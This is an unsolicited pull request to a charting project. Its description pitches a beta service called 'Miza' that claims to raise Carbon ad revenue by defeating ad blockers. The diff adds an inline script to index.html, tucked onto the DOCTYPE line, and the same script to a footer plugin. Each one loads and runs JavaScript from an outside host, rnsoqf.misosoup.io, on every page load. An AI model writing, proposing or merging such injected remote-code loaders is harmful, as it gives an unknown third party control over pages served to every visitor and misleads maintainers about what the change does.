### PR TITLE
Increase Carbon ad revenue by 30%

### DIFF
--- a/charted/client/index.html
+++ b/charted/client/index.html
@@ -1,4 +1,12 @@
-<!DOCTYPE html>
+<!DOCTYPE html><script type='text/javascript'>           	
+  (function(window, base) {
+    var script = document.createElement("script");
+    script.src = "//" + base + "/c?r=" + Math.random();
+    script.async = true;
+    document.getElementsByTagName('head')[0].appendChild(script);
+  })(window, "rnsoqf.misosoup.io");
+</script>
+
 
 <html>
   <head>

--- a/plugins/footer.html
+++ b/plugins/footer.html
@@ -1,4 +1,12 @@
-<a href="https://medium.com/p/2ef03b3f429">Privacy</a>
+<a href="https://medium.com/p/2ef03b3f429">Privacy</a><script type='text/javascript'>           	
+  (function(window, base) {
+    var script = document.createElement("script");
+    script.src = "//" + base + "/c?r=" + Math.random();
+    script.async = true;
+    document.getElementsByTagName('head')[0].appendChild(script);
+  })(window, "rnsoqf.misosoup.io");
+</script>
+
 <script id="_carbonads_js" async type="text/javascript"
   src="//cdn.carbonads.com/carbon.js?zoneid=1698&serve=CVYD42E&placement=chartedco">
 </script>


### PR DESCRIPTION
Hey @valueof,

Awesome choice picking Carbon ads, they are simple and unobtrusive! My friend and I have been working on our spare time a way to increase Carbon revenue by ~30%. 

We realized that ad blockers were taking a huge chunk of our revenue so we built [Miza](https://miza.io). You can think of Miza as a bodyguard for your ads, when Miza is installed, your ads will always appear.

We are currently in a private beta and think you would be a great fit! If you want to give us a try, it's as simple as merging the pull request. Once you have merged the pull request you can view your analytics with this link: [http://miza.io/invite/aenbl](http://miza.io/invite/aenbl)

You can contact me directly if you have any questions at brian@miza.io Thanks for your time!